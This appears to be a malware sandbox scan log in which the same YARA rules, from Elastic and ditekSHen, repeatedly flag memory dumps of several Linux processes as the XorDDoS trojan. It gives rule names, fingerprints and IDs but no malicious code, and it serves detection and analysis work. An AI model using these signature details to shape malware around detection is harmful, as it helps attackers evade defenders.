Source: 6278.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6379.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6379.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6379.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6379.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6379.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6379.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6466.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6466.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6466.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6466.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6466.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6466.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6322.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6322.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6322.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6322.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6322.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6322.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6316.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6316.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6316.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6316.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6316.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6316.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
